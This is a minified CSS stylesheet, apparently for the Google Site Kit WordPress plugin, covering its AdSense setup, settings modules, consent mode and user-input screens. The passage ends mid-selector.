.googlesitekit-setup-module--adsense__stage-image-container{height:calc(100% + 70px);margin-bottom:12px;margin-top:-70px}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-image{align-items:center;display:flex;grid-column-start:1;grid-row-start:1;height:100%;justify-content:center;opacity:0;width:100%}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-image svg{flex:1;max-height:312px;max-width:100%}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-image--current--static{opacity:1}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-image--current--enter{animation:googlesitekit-fade-in var(--adsense-connect-cta-fade-in-duration) linear forwards}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-image--current--leave{animation:googlesitekit-fade-out var(--adsense-connect-cta-fade-out-duration) linear forwards}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-indicator{display:grid;grid-auto-flow:column;grid-gap:6px;justify-content:flex-start;margin:12px 0 20px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-indicator{display:none}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-indicator li{background-color:rgba(0,0,0,.1);border-radius:1px;height:2px;width:26px;--adsense-connect-cta-indicator-duration: 500ms}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-indicator li.googlesitekit-setup-module--adsense__stage-indicator--current--static{background-color:#446199}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-indicator li.googlesitekit-setup-module--adsense__stage-indicator--current--enter,.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-indicator li.googlesitekit-setup-module--adsense__stage-indicator--current--leave{background-image:linear-gradient(0deg, #446199 0%, #446199 100%);background-repeat:no-repeat}@keyframes googlesitekit-indicator-enter{from{background-size:0% 100%}to{background-size:100% 100%}}@keyframes googlesitekit-indicator-leave{from{background-size:100% 100%}to{background-size:0% 100%}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-indicator li.googlesitekit-setup-module--adsense__stage-indicator--current--enter{animation:googlesitekit-indicator-enter var(--adsense-connect-cta-indicator-duration) linear forwards;background-position:0% 0%}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-indicator li.googlesitekit-setup-module--adsense__stage-indicator--current--leave{animation:googlesitekit-indicator-leave var(--adsense-connect-cta-indicator-duration) linear forwards;background-position:100% 0%}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module__action{display:flex;flex-wrap:wrap;gap:4px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module__action{gap:10px}}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module__footer-text{align-items:flex-end;display:flex;justify-content:flex-end}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module__footer-text a{-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module__footer-text p{font-size:12px;margin:0}.googlesitekit-plugin #js-googlesitekit-settings .googlesitekit-layout__header{border:none}.googlesitekit-plugin #js-googlesitekit-settings .googlesitekit-layout__header .mdc-layout-grid{padding-bottom:0}.googlesitekit-plugin #js-googlesitekit-settings .googlesitekit-layout__header .mdc-layout-grid h3.googlesitekit-layout__header-title{font-size:18px}.googlesitekit-plugin #js-googlesitekit-settings .googlesitekit-settings-module .googlesitekit-settings-module__footer .mdc-layout-grid{padding-top:0}.googlesitekit-plugin .googlesitekit-settings-connect-module{border:1px solid #ebeef0;border-radius:8px;height:100%;padding:16px;width:100%}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-settings-connect-module{padding:24px}}.googlesitekit-plugin .googlesitekit-settings-connect-module .googlesitekit-settings-connect-module__logo{align-items:flex-end;display:flex;height:36px}.googlesitekit-plugin .googlesitekit-settings-connect-module .googlesitekit-settings-connect-module__logo img{display:block}.googlesitekit-plugin .googlesitekit-settings-connect-module .googlesitekit-settings-connect-module__heading{align-items:center;display:flex;flex-wrap:wrap;grid-gap:10px 12px;margin:15px 0 10px}.googlesitekit-plugin .googlesitekit-settings-connect-module .googlesitekit-settings-connect-module__title{margin:0}.googlesitekit-plugin .googlesitekit-settings-connect-module .googlesitekit-settings-connect-module__badges{display:flex;flex-wrap:wrap;grid-gap:10px 12px}.googlesitekit-plugin .googlesitekit-settings-connect-module .googlesitekit-settings-connect-module__text{font-size:14px;letter-spacing:.25px;line-height:1.43;margin:0}.googlesitekit-plugin .googlesitekit-settings-connect-module .googlesitekit-settings-connect-module__switch{float:right}.googlesitekit-plugin .googlesitekit-settings-connect-module .googlesitekit-settings-connect-module__switch .spinner{margin-top:-5px}.googlesitekit-plugin .googlesitekit-settings-connect-module .googlesitekit-settings-connect-module__cta{font-size:14px;letter-spacing:.25px}.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-settings-consent-mode-switch__enabled-notice,.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-settings-consent-mode-requirements__description{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1.33}.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-settings-consent-mode-switch-description--loading{margin:14px 0}.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-settings-consent-mode-requirements__grid{padding:0}.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-settings-consent-mode-requirement{border:1px solid #ebeef0;border-radius:8px;display:flex;flex-direction:column;height:100%;padding:16px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-settings-consent-mode-requirement{padding:24px}}.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-settings-consent-mode-requirement .googlesitekit-typography{font-size:16px;font-weight:500;line-height:1.25;margin:0}.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-settings-consent-mode-requirement__description{flex:1;font-size:12px;letter-spacing:.2px;line-height:1.33}.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-notice{display:flex;flex-direction:column}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-notice{flex-direction:row}}.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-notice .googlesitekit-notice__icon{align-self:start;margin-bottom:6px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-settings-consent-mode .googlesitekit-notice .googlesitekit-notice__icon{align-self:center;margin-bottom:0}}.googlesitekit-plugin .googlesitekit-settings-consent-mode__recommendation-notice{background-color:#dce8ff;color:#2d4a82;font-size:14px;line-height:1.43;margin-bottom:0;margin-top:8px}.googlesitekit-plugin .googlesitekit-settings-consent-mode__recommendation-notice svg{color:#6380b8}.googlesitekit-plugin .googlesitekit-settings-consent-mode-requirement__footer{align-items:flex-start;display:flex;flex:1;flex-direction:column;gap:10px;justify-content:center}.googlesitekit-plugin .googlesitekit-settings-consent-mode-requirement__footer .googlesitekit-notice{margin:1.5em 0}.googlesitekit-plugin .googlesitekit-settings-consent-mode-requirement__consent-api-detected-wrapper{align-items:center;display:flex;flex-direction:column;gap:6px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-settings-consent-mode-requirement__consent-api-detected-wrapper{flex-direction:row;gap:10px}}.googlesitekit-plugin .googlesitekit-settings-consent-mode-requirement__consent-api-detected-icon{align-items:center;align-self:start;background-color:#b8e5ca;border-radius:11px;color:#1f4c04;display:flex;height:22px;justify-content:center;margin-top:10px;min-width:22px;width:22px}.googlesitekit-plugin .googlesitekit-settings-consent-mode-requirement__consent-api-detected-icon svg{height:10px;width:10px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-settings-consent-mode-requirement__consent-api-detected-icon{align-self:center;margin-top:0}}.googlesitekit-plugin .googlesitekit-settings-consent-mode-requirement__install-button{padding:6px 16px}.googlesitekit-plugin .googlesitekit-notice.googlesitekit-settings-consent-mode-requirement__consent-management-plugin-notice{margin-bottom:0;padding:10px 16px}.googlesitekit-plugin .googlesitekit-notice.googlesitekit-settings-consent-mode-requirement__consent-management-plugin-notice .googlesitekit-notice__description{font-size:12px}.googlesitekit-plugin .googlesitekit-settings-email-reporting .googlesitekit-settings-email-reporting__switch{text-wrap:nowrap}.googlesitekit-plugin .googlesitekit-settings-email-reporting .googlesitekit-settings-email-reporting__switch .mdc-switch{margin-top:5px;vertical-align:top}.googlesitekit-plugin .googlesitekit-settings-email-reporting .googlesitekit-settings-email-reporting__switch .mdc-switch+label{display:inline-block;height:auto;line-height:25px;padding-right:35px}.googlesitekit-plugin .googlesitekit-settings-email-reporting .googlesitekit-settings-email-reporting__switch .mdc-switch+label .googlesitekit-settings-email-reporting__label-description{color:#6c726e;text-wrap:wrap}.googlesitekit-plugin .googlesitekit-settings-email-reporting .googlesitekit-settings-email-reporting__manage{margin-top:24px}.googlesitekit-plugin .googlesitekit-settings-email-reporting .googlesitekit-email-reporting__analytics-disconnected-notice{margin-top:24px}.googlesitekit-plugin .googlesitekit-module-settings-group{background-color:#f3f5f7;border-radius:8px;display:flex;flex-direction:column;gap:20px;padding:24px 16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-module-settings-group{padding:24px}}.googlesitekit-plugin .googlesitekit-module-settings-group .googlesitekit-typography{font-size:16px;line-height:1.25;margin:0}.googlesitekit-plugin .googlesitekit-module-settings-group .googlesitekit-module-settings-group__switch{display:flex}.googlesitekit-plugin .googlesitekit-module-settings-group .googlesitekit-module-settings-group__switch .mdc-switch{top:3px}.googlesitekit-plugin .googlesitekit-module-settings-group .googlesitekit-google-tag-gateway-toggle__switch-badge{position:relative;top:-2px}.googlesitekit-plugin .googlesitekit-module-settings-group .googlesitekit-module-settings-group__helper-text{color:#6c726e;flex-basis:100%;font-size:12px;margin:6px 0 0 42px}.googlesitekit-plugin .googlesitekit-module-settings-group .googlesitekit-analytics-enable-enhanced-measurement--loading{padding-top:11px}.googlesitekit-plugin .googlesitekit-module-settings-group .googlesitekit-analytics-enable-enhanced-measurement__progress--settings-edit{margin-bottom:12px}.googlesitekit-settings-meta .googlesitekit-settings-meta__profile{align-items:center;display:flex;margin:16px 0}@media(min-width: 960px){.googlesitekit-settings-meta .googlesitekit-settings-meta__profile{margin:24px 0}}.googlesitekit-settings-meta .googlesitekit-settings-meta__profile .googlesitekit-cta-link{font-style:italic}.googlesitekit-settings-meta .googlesitekit-settings-meta__avatar{border-radius:50%;height:64px;margin-right:16px;width:64px}@media(min-width: 960px){.googlesitekit-settings-meta .googlesitekit-settings-meta__avatar{margin-right:24px}}.googlesitekit-settings-meta .googlesitekit-settings-meta__user-details{font-size:12px;letter-spacing:.2px}.googlesitekit-settings-meta .googlesitekit-settings-meta__user{font-weight:700;margin:0}.googlesitekit-settings-meta .googlesitekit-settings-meta__unlink{font-size:12px;letter-spacing:.2px}.googlesitekit-plugin .googlesitekit-settings-module{border-bottom:1px solid #ebeef0;position:relative}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__status{align-items:center;color:#161b18;display:flex;font-size:14px;font-weight:500;letter-spacing:.25px;line-height:1.43;margin:0;text-align:right}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__status--not-connected{color:#895a00}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__status-icon{align-items:center;background-color:#46732b;border-radius:50%;color:#fff;display:flex;height:19px;justify-content:center;margin-left:16px;width:19px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__status-icon--not-connected,.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__status-icon--warning{background-color:#fff;color:#fece72}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__content{border-top:1px solid #ebeef0;display:none}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__content .mdc-layout-grid__cell{font-size:14px;letter-spacing:.25px;line-height:1.43}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__content--open{border:none;display:block;margin-top:-10px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__heading{align-items:center;display:flex;flex-wrap:wrap;row-gap:12px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__title{align-items:center;display:flex;margin:0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__heading-icon{height:auto;margin-right:16px;width:40px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__heading-badges{align-items:center;display:flex;flex-wrap:wrap;row-gap:12px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__footer-cancel{margin-left:8px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-header{margin:0 0 8px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__fields-group{border-bottom:1px solid #ebeef0;margin-bottom:1em}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__fields-group:last-child,.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__fields-group:has(+.googlesitekit-module-settings-group){border-bottom:none;margin-bottom:0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__fields-group--read-only{border:none}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__fields-group--read-only>span{font-size:14px;letter-spacing:.25px;line-height:1.43}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__fields-group--read-only .mdc-text-field-helper-text{color:#6c726e}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__fields-group--no-border{border:none}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__fields-group-title{font-size:14px;font-weight:500}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-items{align-items:stretch;display:flex;flex-wrap:wrap;margin:0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-select{margin:0 16px 16px 0}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-select{margin:0 24px 24px 0}}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item{margin:0 32px 16px 0;width:100%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item{width:auto}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item{margin:0 48px 24px 0}}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item p{font-size:12px;letter-spacing:.2px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item .googlesitekit-settings-module__meta-item-type{color:#161b18;margin:0 0 8px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item .googlesitekit-settings-module__meta-item-data{color:#161b18;font-size:14px;letter-spacing:.25px;line-height:1.43;margin:0;overflow:hidden;text-overflow:ellipsis}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item .googlesitekit-settings-module__meta-item-data .mdc-linear-progress{margin:8px 0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item .googlesitekit-settings-module__meta-item-data--wrap{word-break:break-all}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item .googlesitekit-settings-module__meta-item-data--tiny{font-size:12px;font-weight:400;letter-spacing:.2px;line-height:1.33}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item .googlesitekit-settings-module__meta-item-info{color:#5f6561;font-size:.75rem}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item--data-only{align-items:flex-end;display:flex}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__meta-item--nomargin{margin:0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-setup-module--analytics .googlesitekit-settings-module__meta-item--data-only{margin-top:-16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-setup-module--analytics .googlesitekit-settings-module__meta-item--data-only{margin-top:0}}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__inline-items{display:flex;flex-wrap:wrap}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__inline-item{margin:0 1rem 0 0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__edit-button-icon svg{color:#6380b8}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__remove-button-icon{color:#cc6240}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__remove-button{align-items:center;display:flex}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__error{background-color:#ac4220;color:#fff;font-weight:700}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__apikey-cancel{font-size:12px;letter-spacing:.2px;margin-left:24px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header{cursor:pointer;display:block;padding:0 32px 0 0;position:relative;width:100%}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header:focus{outline-offset:0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header .googlesitekit-icon-wrapper{height:20px;justify-content:center;position:absolute;right:16px;top:50%;transform:translateY(-50%);width:20px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header .googlesitekit-icon-wrapper svg{color:#5b5b61;height:8px;width:12px}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header .mdc-button{color:#ebeef0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header .mdc-button:disabled{background-color:rgba(8,42,65,.08);color:rgba(3,14,7,.32)}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header .googlesitekit-settings-module__status p{margin:8px 0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header .googlesitekit-settings-module__status--not-connected .mdc-button{margin:-1.5px 0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header .googlesitekit-settings-module__status--loading{align-items:center;display:flex;min-width:150px;padding:.5px 0}.googlesitekit-plugin .googlesitekit-settings-module .googlesitekit-settings-module__header--open .googlesitekit-icon-wrapper{transform:translateY(-50%) rotate(180deg)}.googlesitekit-plugin .googlesitekit-settings-module--active .googlesitekit-overlay{background:rgba(203,208,211,.75)}.googlesitekit-plugin .googlesitekit-settings-module--error{border:3px solid #ac4220}.googlesitekit-plugin .googlesitekit-settings-user-input .googlesitekit-settings-user-input__heading-container{border-bottom:1px solid #ebeef0;margin:12px 0;padding-bottom:12px}.googlesitekit-plugin .googlesitekit-settings-user-input .googlesitekit-settings-user-input__heading{color:#161b18;font-size:12px;line-height:1.33;margin:0}.googlesitekit-plugin .googlesitekit-settings-user-input .googlesitekit-user-input__preview-contents{overflow:visible;padding:0}@media(min-width: 1500px){.googlesitekit-plugin .googlesitekit-settings-user-input .googlesitekit-user-input__select-options-wrapper{padding-left:unset}}.googlesitekit-plugin .googlesitekit-user-input__notification-text-loading{margin:14px 0}.googlesitekit-plugin .googlesitekit-settings-visitor-groups__setup p{font-size:14px;line-height:1.43;margin-top:0}.googlesitekit-plugin .googlesitekit-settings-visitor-groups__setup .googlesitekit-cta-link{margin-top:6px}.googlesitekit-plugin .googlesitekit-settings-visitor-groups__setup-progress{margin-top:16px}.googlesitekit-plugin .googlesitekit-settings-visitor-groups__setup-progress p{margin-bottom:10px}.googlesitekit-plugin .googlesitekit-settings-visitor-groups__setup-success{margin-bottom:30px}.googlesitekit-plugin .googlesitekit-user-input{margin-bottom:30px}.googlesitekit-plugin .googlesitekit-user-input__header{padding-bottom:30px;padding-top:30px}.googlesitekit-plugin .googlesitekit-user-input__header .mdc-layout-grid__inner{align-items:center}.googlesitekit-plugin .googlesitekit-user-input__heading{color:#161b18;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:28px;font-weight:400;line-height:1.286}.googlesitekit-plugin .googlesitekit-user-input__subtitle{color:#6c726e;font-size:14px;line-height:1.14}.googlesitekit-plugin .googlesitekit-user-input__content{padding:0}.googlesitekit-plugin .googlesitekit-user-input__content .mdc-linear-progress__buffer{background-color:#f8faff}.googlesitekit-plugin .googlesitekit-user-input__congrats{background-color:#fff;margin:-10px;padding:35px}.googlesitekit-plugin .googlesitekit-user-input__congrats h1{margin-bottom:0}.googlesitekit-plugin .googlesitekit-user-input__note{color:#5f6561;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-plugin .googlesitekit-user-input__error{background-color:#ffded3;bottom:77px;color:#7a1e00;display:flex;gap:7px;left:0;margin:42px 0 0;padding:1px 30px;position:fixed;right:0}.googlesitekit-plugin .googlesitekit-user-input__error .googlesitekit-error-text{color:#7a1e00;font-weight:500}@media(min-width: 783px){.googlesitekit-plugin .googlesitekit-user-input__error{left:160px}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__error{bottom:97px;left:160px;padding:1px 40px}}.googlesitekit-plugin .googlesitekit-user-input__footer{align-items:center;background-color:#fff;border-top:1px solid #ebeef0;bottom:0;display:flex;flex-direction:column;flex-direction:row-reverse;justify-content:space-between;left:0;margin:42px 0 0;padding:18px 14px;position:fixed;right:0;z-index:1}@media(min-width: 783px){.googlesitekit-plugin .googlesitekit-user-input__footer{left:160px}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__footer{left:160px;padding:23px 24px}}.googlesitekit-plugin .googlesitekit-user-input__footer-nav{column-gap:4px;display:flex}.googlesitekit-plugin .googlesitekit-user-input__footer-cancel{border:none;padding:0}.googlesitekit-plugin .googlesitekit-user-input__select-options-wrapper{grid-row:span 2}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__select-options-wrapper{grid-column-start:9}}@media(min-width: 1500px){.googlesitekit-plugin .googlesitekit-user-input__select-options-wrapper{grid-column-start:7;padding-left:60px}}.googlesitekit-plugin p.googlesitekit-user-input__select-instruction{color:#161b18;font-size:12px;line-height:1.33;margin:0;padding-bottom:15px}@media(min-width: 600px){.googlesitekit-plugin p.googlesitekit-user-input__select-instruction{color:#6c726e;font-size:18px;font-weight:500}}.googlesitekit-plugin .googlesitekit-user-input__author p{color:#6c726e;font-size:12px;letter-spacing:.25px;line-height:1.33;margin:0 0 3px}.googlesitekit-plugin .googlesitekit-user-input__author .googlesitekit-user-input__author-info{align-items:center;color:#5f6561;display:flex;font-size:12px;letter-spacing:.2px;margin-top:4px}.googlesitekit-plugin .googlesitekit-user-input__author .googlesitekit-user-input__author-info img{border-radius:50%;height:24px;margin-right:8px;width:24px}.sb-show-main .googlesitekit-plugin .googlesitekit-user-input__footer,.sb-show-main .googlesitekit-plugin .googlesitekit-user-input__error{left:0}@media(min-width: 783px){.auto-fold .googlesitekit-plugin .googlesitekit-user-input__footer{left:36px}}@media(min-width: 960px){.auto-fold .googlesitekit-plugin .googlesitekit-user-input__footer{left:160px;padding:23px 24px}}@media(min-width: 783px){.folded .googlesitekit-plugin .googlesitekit-user-input__question .googlesitekit-user-input__footer,.folded .googlesitekit-plugin .googlesitekit-user-input__preview .googlesitekit-user-input__footer{left:36px}}@media(min-width: 783px){.auto-fold .googlesitekit-plugin .googlesitekit-user-input__error{left:36px}}@media(min-width: 960px){.auto-fold .googlesitekit-plugin .googlesitekit-user-input__error{left:160px}}@media(min-width: 783px){.folded .googlesitekit-plugin .googlesitekit-user-input__question .googlesitekit-user-input__error,.folded .googlesitekit-plugin .googlesitekit-user-input__preview .googlesitekit-user-input__error{left:36px}}.googlesitekit-plugin .googlesitekit-user-input__question,.googlesitekit-plugin .googlesitekit-user-input__preview{background-color:#fff;border-radius:0 0 24px 24px}.googlesitekit-plugin .googlesitekit-user-input__question-progress{padding:0 17px 5px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__question-progress{padding:0 24px 10px}}.googlesitekit-plugin .googlesitekit-user-input__question-contents{padding:17px;position:relative}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__question-contents{padding:28px 24px}}.googlesitekit-plugin .googlesitekit-user-input__question-number,.googlesitekit-plugin p.googlesitekit-user-input__preview-subheader{color:#6c726e;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.14;margin-bottom:10px}.googlesitekit-plugin .googlesitekit-user-input__question-instructions{display:flex;flex-direction:column}@media(min-width: 1500px){.googlesitekit-plugin .googlesitekit-user-input__question-instructions{padding-right:60px}}.googlesitekit-plugin .googlesitekit-user-input__question-instructions h1{color:#161b18;font-size:14px;font-weight:500;line-height:1.33;margin:0 0 14px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__question-instructions h1{font-size:32px;font-weight:400;line-height:1.25;margin:0 0 16px}}.googlesitekit-plugin .googlesitekit-user-input__question-instructions .googlesitekit-user-input__question-instructions--description{color:#161b18;font-size:12px;font-weight:400;letter-spacing:.25px;line-height:1.158;margin:0 0 1em}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__question-instructions .googlesitekit-user-input__question-instructions--description{font-size:14px;line-height:1.43;margin:0 0 25px}}.googlesitekit-plugin .googlesitekit-user-input__question-info p{color:#6c726e;font-size:12px;letter-spacing:.25px;line-height:1.33;margin:0 0 3px}.googlesitekit-plugin p.googlesitekit-user-input__question-notice{color:#6c726e;font-size:12px;font-weight:400;letter-spacing:.25px;line-height:1.33;margin:0 0 1em}@media(min-width: 960px){.googlesitekit-plugin p.googlesitekit-user-input__question-notice{margin:0 0 16px}}.googlesitekit-plugin .googlesitekit-user-input__question--progress{margin:0 auto}.googlesitekit-plugin .googlesitekit-user-input__preview .googlesitekit-user-input__question-instructions--notice{background-color:#cbd0d3;color:#161b18;display:block;font-size:14px;letter-spacing:.25px;line-height:1.43;width:100%}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-user-input__preview .googlesitekit-user-input__question-instructions--notice{display:inline-block;margin:0;width:auto}}.googlesitekit-plugin .googlesitekit-user-input__preview-loading{padding:50px 23px}.googlesitekit-plugin .googlesitekit-user-input__preview-contents{padding:17px 17px 26px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__preview-contents{padding:28px 24px 18px}}.googlesitekit-plugin p.googlesitekit-user-input__preview-subheader{margin-bottom:14px}@media(min-width: 960px){.googlesitekit-plugin p.googlesitekit-user-input__preview-subheader{margin-bottom:37px}}.googlesitekit-plugin .googlesitekit-user-input__preview-notice{padding:0 17px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__preview-notice{padding:0 24px}}.googlesitekit-plugin .googlesitekit-user-input__preview-answers{display:flex;flex-wrap:wrap;gap:18px 12px;padding-bottom:8px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__preview-answers{padding-bottom:11px}}.googlesitekit-plugin .googlesitekit-user-input__preview-answer{align-items:center;background-color:#b8e5ca;border-radius:24px;color:#161b18;display:flex;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;letter-spacing:.25px;line-height:1.43;padding:8px 13px;word-break:break-word}.googlesitekit-plugin .googlesitekit-user-input__preview-group .googlesitekit-user-input__author{margin:24px 0 28px}.googlesitekit-plugin .googlesitekit-user-input__preview-group+.googlesitekit-user-input__preview-group{border-top:1px solid #ebeef0;margin-top:12px;padding-top:12px}.googlesitekit-plugin .googlesitekit-user-input__preview-group-title{display:flex;flex-direction:column-reverse;justify-content:space-between;margin-bottom:14px}.googlesitekit-plugin .googlesitekit-user-input__preview-group-title.googlesitekit-user-input__preview-group-title-with-subtitle{margin-bottom:0}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-user-input__preview-group-title{flex-direction:row}}.googlesitekit-plugin .googlesitekit-user-input__preview-group-title p{color:#202124;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:500;margin:0}.googlesitekit-plugin .googlesitekit-user-input__preview-group-title button{align-items:center;display:flex;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:500;gap:4px;margin-left:auto;padding:3px 7px 3px 12px}.googlesitekit-plugin .googlesitekit-user-input__preview-group-title button[disabled]{color:#b8bdb9}.googlesitekit-plugin .googlesitekit-user-input__preview-group-title button svg{fill:none;transition:transform .2s ease-out}.googlesitekit-plugin .googlesitekit-user-input__preview-group-title button:hover svg,.googlesitekit-plugin .googlesitekit-user-input__preview-group-title button:focus svg{fill:none}.googlesitekit-plugin .googlesitekit-user-input__preview-group-subtitle p{margin-top:0}.googlesitekit-plugin .googlesitekit-user-input__preview-group-subtitle .googlesitekit-user-input__preview-group-subtitle-component{margin:14px 0 25px}.googlesitekit-plugin .googlesitekit-user-input__preview-group--editing .googlesitekit-user-input__preview-group-title button svg{transform:rotate(180deg)}.googlesitekit-plugin .googlesitekit-user-input__preview-actions{align-items:center;column-gap:4px;display:flex}.googlesitekit-plugin 